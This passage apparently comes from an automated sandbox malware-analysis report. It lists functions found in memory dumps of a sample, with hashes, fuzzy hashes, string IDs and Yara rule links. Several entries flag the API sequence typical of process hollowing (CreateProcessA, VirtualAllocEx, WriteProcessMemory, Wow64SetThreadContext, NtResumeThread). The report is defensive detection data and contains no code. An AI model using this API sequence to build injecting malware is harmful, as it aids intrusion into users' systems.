Instruction Fuzzy Hash: 1A1103B1D002098FDB10DFAAC5857EEFBF4EF48324F24842AD459A7250C779A948CFA4

Function 063137F8 Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(?,?), ref: 06313866

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 0856ca5520d5bdf85c4a1e7238942ca54ee519298b0aabdea97196243ca16e8c
Instruction ID: 795570ac5ecf5c0191536d3112e7d1ebb6d201c4f174296f1601c6f5a8ac93cf
Opcode Fuzzy Hash: 0856ca5520d5bdf85c4a1e7238942ca54ee519298b0aabdea97196243ca16e8c
Instruction Fuzzy Hash: 5C11F9B1D002498FDB14DFAAC4447DEFBF4EF48324F54842AD459A7250C775A944CFA5

Function 0660EEC8 Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

Deq, xrefs: 0660EFCD

Memory Dump Source

Source File: 00000004.00000002.2042446365.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_65f0000_Count.jbxd

Similarity

API ID:
String ID: Deq
API String ID: 0-948982800
Opcode ID: d438d0d5a89879d98193e466ccc5923d1c657089bd7626bd42cc61da580d8fd5
Instruction ID: 3ba8e889829d915530317a42a29c4489d03cd7f855cd2ade4ab87908bcc57650
Opcode Fuzzy Hash: d438d0d5a89879d98193e466ccc5923d1c657089bd7626bd42cc61da580d8fd5
Instruction Fuzzy Hash: 7ED1D474E01218CFDB58DFA9D994A9DBBB2FF89300F1084A9D409AB365DB319D86CF41

Function 061E7340 Relevance: 1.5, Strings: 1, Instructions: 270COMMON

Download Yara Rule

Strings

Te^q, xrefs: 061E74FE

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 43c9fb5f3410c1d58ae77712da49154027b6b2fe85aff6081915650267a19a1d
Instruction ID: 2bc2772e8480bf7b0d77c5845f27317c75da4748bdedd8d26fb336bd28785678
Opcode Fuzzy Hash: 43c9fb5f3410c1d58ae77712da49154027b6b2fe85aff6081915650267a19a1d
Instruction Fuzzy Hash: B1C1C674E01618CFEB98CFA9D588B9DBBF2BF49304F2494A9D409A7391DB709985CF40

Function 061E7350 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

Te^q, xrefs: 061E74FE

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 1ffbd674968a1c4defb4de3d9f2f8fa8f61eeb43868f9e5a7f33ffadbf377fc6
Instruction ID: 534f1850fbd56007ec09539ba14bd237cd1ba1e830df99e024909a77ef2ab1a5
Opcode Fuzzy Hash: 1ffbd674968a1c4defb4de3d9f2f8fa8f61eeb43868f9e5a7f33ffadbf377fc6
Instruction Fuzzy Hash: B6B1E870E05658CFEB98CFA9D588B9DBBF2BF49304F2094A9D409A7391DB709985CF40

Function 0551EB78 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb35d6a86fe323fbf9bbfae1bc10cca74e5681a0f8c0e28df618799fe72029ee
Instruction ID: d95f2ab731b6ab0e5ffd07aaac87972b26543f7712e9dbe0b9e114b60f733b56
Opcode Fuzzy Hash: cb35d6a86fe323fbf9bbfae1bc10cca74e5681a0f8c0e28df618799fe72029ee
Instruction Fuzzy Hash: 22B1D374E00218CFEB54DF69C955B9EBBF6BB48300F00C4AAE909A7354DB309989CF95

Function 061DA730 Relevance: 4.2, Strings: 3, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 061DAC05
Hbq, xrefs: 061DAC34
Hbq, xrefs: 061DAC84

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: Hbq$Hbq$Hbq
API String ID: 0-2297679979
Opcode ID: 34082b53f0010db169e332dc67028a2036e4091f6970233ed82bd1ccdf110158
Instruction ID: 90edbc90387a8feaafd68766412777e2486a0d6dc6d13d5ac070bba14d6194b0
Opcode Fuzzy Hash: 34082b53f0010db169e332dc67028a2036e4091f6970233ed82bd1ccdf110158
Instruction Fuzzy Hash: DB128031A006148FCBA4DFA9D984A6EB7F6FF88300F14852DE5469B395DB31EC46CB90

Function 061DC3E8 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 061DC6E1
4'^q, xrefs: 061DC761
4'^q, xrefs: 061DC602

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q
API String ID: 0-1196845430
Opcode ID: 455d14860f3f48b29145eeac970fb80e7bafe0aaf4e297562bd9c090efb77212
Instruction ID: 86eb3c202d0a1e0f45c2619e5993267d8ff5b96d7a8513bec8381de9ab074b6a
Opcode Fuzzy Hash: 455d14860f3f48b29145eeac970fb80e7bafe0aaf4e297562bd9c090efb77212
Instruction Fuzzy Hash: 25F1C874A00118DFDB48DFA4D998E9DB7B6FF88300F158559E906AB3A5DB71EC42CB80

Function 06121EA8 Relevance: 3.1, Strings: 2, Instructions: 577COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06122659
4'^q, xrefs: 06122669

Memory Dump Source

Source File: 00000004.00000002.2041396988.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6120000_Count.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 12942732512ebe91a4365be64be1519090a077fa5dd3aa7d60093ddada113467
Instruction ID: 481894b8159f718bfc325f9c25e317dd7c84242cc70526c516bdc732fdb8490f
Opcode Fuzzy Hash: 12942732512ebe91a4365be64be1519090a077fa5dd3aa7d60093ddada113467
Instruction Fuzzy Hash: 31420734E0422ADFDB98CFA8D548AAEB7B2FF48301F108415D926B7354C7359A96CF91

Function 061229D0 Relevance: 2.9, Strings: 2, Instructions: 362
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06122E76
4'^q, xrefs: 06122E66

Memory Dump Source

Source File: 00000004.00000002.2041396988.0000000006120000.00000040.00000800.00020000.00000000.sdmp, Offset: 06120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6120000_Count.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 9fc3efee56200b84350ff13c2415a5c612d03ec3e3b859ed616d299f85d82326
Instruction ID: 459810102d4b34884900bc9b96780fcdd3bd6a42f05dbecc88c1e624ae3877a4
Opcode Fuzzy Hash: 9fc3efee56200b84350ff13c2415a5c612d03ec3e3b859ed616d299f85d82326
Instruction Fuzzy Hash: 65F1F874D01229DFCB98DFA9E5886ACBBB2FF49301F208529E406A7350CB355A91CF91

Function 061D6270 Relevance: 2.7, Strings: 2, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 061D6405
(bq, xrefs: 061D6376

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: (bq$Hbq
API String ID: 0-4081012451
Opcode ID: 620c35b8cc946b448d6f4707a55f9a341849c1ad6afa52639f604a04da4ce8ca
Instruction ID: 07e3ad569d083b0ec9dcfb4dc60c75b98887578f5a7b9d292a304ff5db111bdc
Opcode Fuzzy Hash: 620c35b8cc946b448d6f4707a55f9a341849c1ad6afa52639f604a04da4ce8ca
Instruction Fuzzy Hash: A4517430B006608FC7A9AF29C85452EBBB6FF89340724856CE546DB3A1DF34EC46CB95

Function 061E11C0 Relevance: 2.6, Strings: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

R, xrefs: 061E11ED
-, xrefs: 061E291B

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: -$R
API String ID: 0-3143228895
Opcode ID: 1719cc316ac5d1354d7a8fbb7180834ee94fcb259994263610d413b0a52a3fca
Instruction ID: 1218b8730311a04ec2d02232bfba3222cf25b6973ae06345ab0e0bc97734b49a
Opcode Fuzzy Hash: 1719cc316ac5d1354d7a8fbb7180834ee94fcb259994263610d413b0a52a3fca
Instruction Fuzzy Hash: 1231137494062CCFDBA4EF60DC44B9EBBB1BF49304F4045E9D50A67260CB719A85CF81

Function 0551A7B3 Relevance: 2.6, Strings: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

/, xrefs: 0551A871
', xrefs: 0551A897

Memory Dump Source

Source File: 00000004.00000002.2039805759.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5510000_Count.jbxd

Similarity

API ID:
String ID: '$/
API String ID: 0-2558154120
Opcode ID: 6415788a1009e414e303b5ed5019f30f4be7fe281703cc476af4e920ef926912
Instruction ID: 91bcb2ec5675a23666de947378830aba3149f345f3d0279b33740579bcf83a67
Opcode Fuzzy Hash: 6415788a1009e414e303b5ed5019f30f4be7fe281703cc476af4e920ef926912
Instruction Fuzzy Hash: F331B2749052688FDB60DF58D944BECBBB2FB49300F0080EAE949AB391DB345E89DF45

Function 061E14A5 Relevance: 2.5, Strings: 2, Instructions: 28COMMON

Download Yara Rule

Strings

B, xrefs: 061E14E5
S, xrefs: 061E0DE2

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: B$S
API String ID: 0-2413125972
Opcode ID: 33df8bfe5da32cfd42b266ea04b46654d261bc7b0dfac4a0f85461394a31557e
Instruction ID: db87ed6e7d938ed1e26bd5556febd84dfaa9e1286ad4eb18e06b29d093febd26
Opcode Fuzzy Hash: 33df8bfe5da32cfd42b266ea04b46654d261bc7b0dfac4a0f85461394a31557e
Instruction Fuzzy Hash: CD012474A05628CFDBA5DF64E888B99B7B9FB48305F101098E509A7394CB308FC8CF42

Function 061E1A86 Relevance: 2.5, Strings: 2, Instructions: 21COMMON

Download Yara Rule

Strings

@, xrefs: 061E1AAB
C, xrefs: 061E1AD7

Memory Dump Source

Source File: 00000004.00000002.2041896247.00000000061E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61e0000_Count.jbxd

Similarity

API ID:
String ID: @$C
API String ID: 0-2447811934
Opcode ID: 8a6180c6eef74053a64e5a797fb642a4a48be92169f12f64f27004bf46ead688
Instruction ID: bd53a3cd442cf980b98f592f5ccb6d7f545191df16aa2eabb3b46f5801ad1544
Opcode Fuzzy Hash: 8a6180c6eef74053a64e5a797fb642a4a48be92169f12f64f27004bf46ead688
Instruction Fuzzy Hash: 0EF0B2B4D4122C8FDBA4DF94D884B8DBBF5BB08304F0084E9E609A7240DB749BC48F99

Function 061DD2C0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON

Download Yara Rule

Strings

,bq, xrefs: 061DD63B

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: a01ead8a2154f2c8d629199370057b0ab2704dec436a5db115900d032df5a63c
Instruction ID: 5a593eb1b3aa455fb5e5c2b8a3573141896af0187536a5cf99906fb6e93459e5
Opcode Fuzzy Hash: a01ead8a2154f2c8d629199370057b0ab2704dec436a5db115900d032df5a63c
Instruction Fuzzy Hash: 4F52E675E002289FDB64DF68C981B9DBBF6BF88300F1585D9E509A7391DA309E81CF61

Function 061D7820 Relevance: 1.8, Strings: 1, Instructions: 531COMMON

Download Yara Rule

Strings

(_^q, xrefs: 061D7AAD

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: (_^q
API String ID: 0-538443824
Opcode ID: c2afa868b97629dc9d95da5b61c5d3b990b937f6440a3d150fc39630956af61b
Instruction ID: 03d9bc60088e0a0ca600097b9a3864dc7d12e59f4dd0ac8b940dffc954f69e68
Opcode Fuzzy Hash: c2afa868b97629dc9d95da5b61c5d3b990b937f6440a3d150fc39630956af61b
Instruction Fuzzy Hash: 70229E35A002149FDB54DFA9D894AADB7F2FF88300F158469E906EB3A1DB71ED41CB90

Function 063113F4 Relevance: 1.7, APIs: 1, Instructions: 203processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 063115DA

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fbc06b06ec00d5d4d9643471f20837d1b523cecfa3683d663daffe6c345d9402
Instruction ID: 5751f04762492049794fceadbfcebe3994946b8b6d214f3d21d8054deb44d8a6
Opcode Fuzzy Hash: fbc06b06ec00d5d4d9643471f20837d1b523cecfa3683d663daffe6c345d9402
Instruction Fuzzy Hash: 60817771D102198FDB54CFA9C8827EEBBF2BF48314F14852AE859EB244DB759885CF81

Function 06311400 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 063115DA

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 47d002dbd10ba952dbe667600450e254b13a7825f34c14a21c616d5924cbe825
Instruction ID: c9ee361699094ea021df51203f42446066d13afa098cd73751933a8fb418288b
Opcode Fuzzy Hash: 47d002dbd10ba952dbe667600450e254b13a7825f34c14a21c616d5924cbe825
Instruction Fuzzy Hash: 8C815671D102098FDB54CFA9C8827EEBBF2BF48314F14852AE859EB244DB759885CF81

Function 061DE13B Relevance: 1.7, Strings: 1, Instructions: 411COMMON

Download Yara Rule

Strings

$^q, xrefs: 061DE28F

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: b44976e232181decef69ad44ee07fbdce48205524abef4c2a1cf1bf31d4c0c5d
Instruction ID: e4cea7656dca26936ad2ce7e3ddf4dfb40db0e825cf87b3ac4b9f33357323ef7
Opcode Fuzzy Hash: b44976e232181decef69ad44ee07fbdce48205524abef4c2a1cf1bf31d4c0c5d
Instruction Fuzzy Hash: 81E10174B002418FE7959F28C85176EBBE2EF84301F158869EA82DF3D1DB34D941CB92

Function 06312498 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06312530

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ebf81db1aa916bc8ef35cd9eaba5e447c73b1ef4b765f9748f49effff83a6e40
Instruction ID: 6be9eca5c418c3b450d7a21cfd85fd8976252bd3e73bf482492d9a4678d73c0b
Opcode Fuzzy Hash: ebf81db1aa916bc8ef35cd9eaba5e447c73b1ef4b765f9748f49effff83a6e40
Instruction Fuzzy Hash: E32148B5900359DFCB10CFA9C881BEEBBF1FF48310F10842AE959A7250D7789684CBA0

Function 063124A0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06312530

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: c63c6d1023e7b5eaefd8d86aef3cdfb7149844327ec294b3d17f5971bddf5988
Instruction ID: 9f9dc5a384a8f7916c534939b685b1ca567d4210b2ffd5bc6a46ac2378d3d068
Opcode Fuzzy Hash: c63c6d1023e7b5eaefd8d86aef3cdfb7149844327ec294b3d17f5971bddf5988
Instruction Fuzzy Hash: 212127B19003599FCB10CFA9C885BEEFBF5FF48310F108429E959A7250C7789A44CBA4

Function 06312BA9 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06312C2E

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: cc380ed9ccf4919fa435e8452e24d28a1cff4fa476132e6c684b605bd3dc48bd
Instruction ID: ae45e535563d830268a4cc7e483052205077b605798fdef42487fbcf4f92f02d
Opcode Fuzzy Hash: cc380ed9ccf4919fa435e8452e24d28a1cff4fa476132e6c684b605bd3dc48bd
Instruction Fuzzy Hash: 5B2157B6D002088FDB14CFA9C5857EEBBF4AF48314F14842AD559AB240C7389A89CFA4

Function 06312BB0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06312C2E

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 49b670fa4a9fe9e8af13515f1cbd20f068fe62497d4e0ed9c930564af5c95814
Instruction ID: af249356492cc4a52539c03eb03344b9915f09d45ca82bfea98214bb1fe48914
Opcode Fuzzy Hash: 49b670fa4a9fe9e8af13515f1cbd20f068fe62497d4e0ed9c930564af5c95814
Instruction Fuzzy Hash: 0A2107B1D002098FDB14DFAAC4857EEBBF4EB48324F148429D559A7240D778AA85CFA5

Function 0633DF38 Relevance: 1.6, APIs: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0633DFB4

Memory Dump Source

Source File: 00000004.00000002.2042006437.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6330000_Count.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4bf3fb4dcda398ab7c1009705c7c55c42c41024a87c0d7ca805999d9c227eae7
Instruction ID: dd0a4ad84d62e0caca8fd53977e76b1e5bae5da9b26fb526160a46c9294a9535
Opcode Fuzzy Hash: 4bf3fb4dcda398ab7c1009705c7c55c42c41024a87c0d7ca805999d9c227eae7
Instruction Fuzzy Hash: CF2135B18002498FDB10CFAAC984BEEFBF1EF48324F14842AE459A7250C778A545CFA0

Function 0633DF40 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0633DFB4

Memory Dump Source

Source File: 00000004.00000002.2042006437.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6330000_Count.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0c21c4188e78cf08560335f82f005daa1a47f0cf057fcceb3f51289f1333c4d8
Instruction ID: fd00cc97067428a1154eb7e710637c3d853df77a86a13d3d5ea9bc1e5477541f
Opcode Fuzzy Hash: 0c21c4188e78cf08560335f82f005daa1a47f0cf057fcceb3f51289f1333c4d8
Instruction Fuzzy Hash: 112115B18002498FDB10DFAAC484BEEFBF4EF48320F148429D459A7250CB79A544CFA5

Function 060F05DF Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 060F0654

Memory Dump Source

Source File: 00000004.00000002.2041242595.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60f0000_Count.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c9a757a3802dedf0b3c86117dbedae8acfabdea88a99d6fffe9d5f5cd0206913
Instruction ID: 5c916e31544dcfba982d39e0ce4bd6b586ab33f8e8a75c71a37a366567662413
Opcode Fuzzy Hash: c9a757a3802dedf0b3c86117dbedae8acfabdea88a99d6fffe9d5f5cd0206913
Instruction Fuzzy Hash: FB21F7B1D002499FCB10DFAAC844AEEFBF4AF88310F14842EE459A7250C7759544CFA5

Function 060F05E0 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 060F0654

Memory Dump Source

Source File: 00000004.00000002.2041242595.00000000060F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_60f0000_Count.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 104e5c97cfe42f4776210c3c6638fc1e78f8e716a82d28640bf04a10cbce7713
Instruction ID: d285aae3cea0a93b288bc89f29dad952c3f3a9601e206c15a9cee510bec60fd8
Opcode Fuzzy Hash: 104e5c97cfe42f4776210c3c6638fc1e78f8e716a82d28640bf04a10cbce7713
Instruction Fuzzy Hash: FF1106B1D002499FCB10DFAAC844AEEFBF4FF88320F14842AE559A7250C775A944CFA5

Function 063131A8 Relevance: 1.6, APIs: 1, Instructions: 54memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0631321E

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2d2b6230ed381b8908caa26570dce1e1dcd41735bdda9c3877998b8accacb3c0
Instruction ID: 0f577eb9ba2a5a39631fe8acefb9b77e28416072909732798986b7120f5b3d06
Opcode Fuzzy Hash: 2d2b6230ed381b8908caa26570dce1e1dcd41735bdda9c3877998b8accacb3c0
Instruction Fuzzy Hash: D31159B5900249CFDB10DFA9C8457DEFBF5EF48310F148419E559A7250C7359544CFA4

Function 0633CE46 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

SleepEx.KERNEL32 ref: 0633CE87

Memory Dump Source

Source File: 00000004.00000002.2042006437.0000000006330000.00000040.00000800.00020000.00000000.sdmp, Offset: 06330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6330000_Count.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 0b9a3f518267d1d21ddb002a8aff534e7605be78a20ca28d1f2d69ab802fa71b
Instruction ID: bf8883978493683d283e550db0c2fa96fb654df7b26b70dcbba147e40f61049c
Opcode Fuzzy Hash: 0b9a3f518267d1d21ddb002a8aff534e7605be78a20ca28d1f2d69ab802fa71b
Instruction Fuzzy Hash: F7015AB19003298EDB14DBAAC8447EEFBF5AF84324F14C42AD099A7250CA389584CB90

Function 063131B0 Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0631321E

Memory Dump Source

Source File: 00000004.00000002.2041971076.0000000006310000.00000040.00000800.00020000.00000000.sdmp, Offset: 06310000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6310000_Count.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: dbc620eaeae67c98ba8760ea01b8805d7864fc66c15e4d6b391a3f9bb46f74a2
Instruction ID: 14c7b3632f386b010c05b7c8b75ac80baedd220863c9d556375ff77bd83784c7
Opcode Fuzzy Hash: dbc620eaeae67c98ba8760ea01b8805d7864fc66c15e4d6b391a3f9bb46f74a2
Instruction Fuzzy Hash: 3B0135B18003899FDB14DFAAC844BEEBFF5AB48314F108419E519AB250C779A584CFA5

Function 061DD2BE Relevance: 1.5, Strings: 1, Instructions: 284COMMON

Download Yara Rule

Strings

,bq, xrefs: 061DD63B

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 1ffa4d98c1633156b8320639a04f9a940ab7e61f298648e95bc042c701624312
Instruction ID: a0563a82ee1eb6c0de280d1fa68139d90a0afe61ba7b2cac88f67d90b4ef216d
Opcode Fuzzy Hash: 1ffa4d98c1633156b8320639a04f9a940ab7e61f298648e95bc042c701624312
Instruction Fuzzy Hash: 2AC14E74A002289FDB54DB68C945BDDBBF6EF88700F158099E509AB3A5CB31DD81CFA1

Function 00B699A1 Relevance: 1.5, Strings: 1, Instructions: 248COMMON

Download Yara Rule

Strings

PH^q, xrefs: 00B69DD5

Memory Dump Source

Source File: 00000004.00000002.2028757237.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_b60000_Count.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 6391fe6c1b94ecd493b9de0b2216db6ab76c084a575720f49cec2cfe815ebfe7
Instruction ID: 7031f0dd02fe2958d6f8b49c8d26eede47decc1cb01a79a1adf63d67254b06d5
Opcode Fuzzy Hash: 6391fe6c1b94ecd493b9de0b2216db6ab76c084a575720f49cec2cfe815ebfe7
Instruction Fuzzy Hash: F1D1A1B4A45269CFDB64CF24D9887E9B7F5BB4A301F1081EAD40AA3651DB784EC4CF42

Function 061DC3D8 Relevance: 1.5, Strings: 1, Instructions: 227COMMON

Download Yara Rule

Strings

4'^q, xrefs: 061DC602

Memory Dump Source

Source File: 00000004.00000002.2041826059.00000000061D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_61d0000_Count.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: 9487733ce4b9ee731c116c4d1eda8f779b8104bcaac7cff21526e96e6ffa56eb
Instruction ID: 4e1c8386e195ee8fbd1233b09eea766029114fcaccf805cb6d4f4e1ff479fc78
